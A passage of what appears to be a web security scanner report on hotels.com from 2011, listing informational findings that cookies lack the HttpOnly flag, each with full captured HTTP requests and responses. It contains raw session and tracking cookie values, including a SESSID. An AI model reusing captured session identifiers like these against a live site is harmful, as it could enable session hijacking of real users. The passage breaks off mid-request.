Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMToxNDcuNi4wLmk2OjkyLjAuMC5pMToxMjEuNTAzLjAuaTc6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:16 GMT; Path=/


14.244. http://www.hotels.com/PPCSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /PPCSearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PPCSearch?city=Boston,&arrivalDate=04/10/2011&adultsPerRoom=2&numberOfRooms=1&departureDate=07/10/2011 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=1; SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en_US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Location: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Content-Length: 0
Expect:
Content-Type: text/plain; charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:09:56 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:09:56 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:09:56 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:09:56 GMT; Path=/


14.245. http://www.hotels.com/compare/hotel_dockingbar.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-691979445 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 3650
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 3650
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:09 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:09 GMT; Path=/
Set-Cookie: user=RCoxMjQuMS4wLmkxOjk3LjczLjEuaTM6OTguNi40OjEzNy4wLjAuaTI6MTQ1LjAuMC5pMjoxMDguMS4wLmkyOjE1Mi4wLjAuaTI6Mi4yLjE6MTk2LjEuMDo5Mi4wLjAuaTE6MTMyLjIuMC5pMjoxMjEuNTAzLjAuaTc6MTM4LjEuMDoxOTUuMC4wOjEwNC4wLjF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:09 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n
...[SNIP]...

14.246. http://www.hotels.com/hotel/details.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:28:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=H7gAAAAAAAIAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:28:19 GMT
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Content-Length: 238921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...

14.247. http://www.hotels.com/hotel/hoteldata.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/hoteldata.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:28:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=103.4.1.i6%3A132.2.0.i2%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:56 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTAzLjQuMS5pNjoxMzIuMi4wLmkyfEhDT01fVVMhRSoxMDkzNjh8MDQvMTAvMjAxMXwwNy8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:57 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h
...[SNIP]...

14.248. http://www.hotels.com/hoteldetails/urgencypopup.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
ntCoent-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:28:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMjEuNTAzLjAuaTc6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:41 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>

14.249. http://www.hotels.com/html/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /html/blank.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html/blank.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cteonnt-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSPV=usAAAAAAAAAAAAAAAAAAAAAAAAsAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>

14.250. http://www.hotels.com/html/tealeaf.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /html/tealeaf.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /html/tealeaf.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
Content-Length: 1348
Origin: http://www.hotels.com
X-TeaLeaf-Page-Img-Fail: 36
X-TeaLeaf-Page-Render: 63175
X-TeaLeaf: ClientEvent
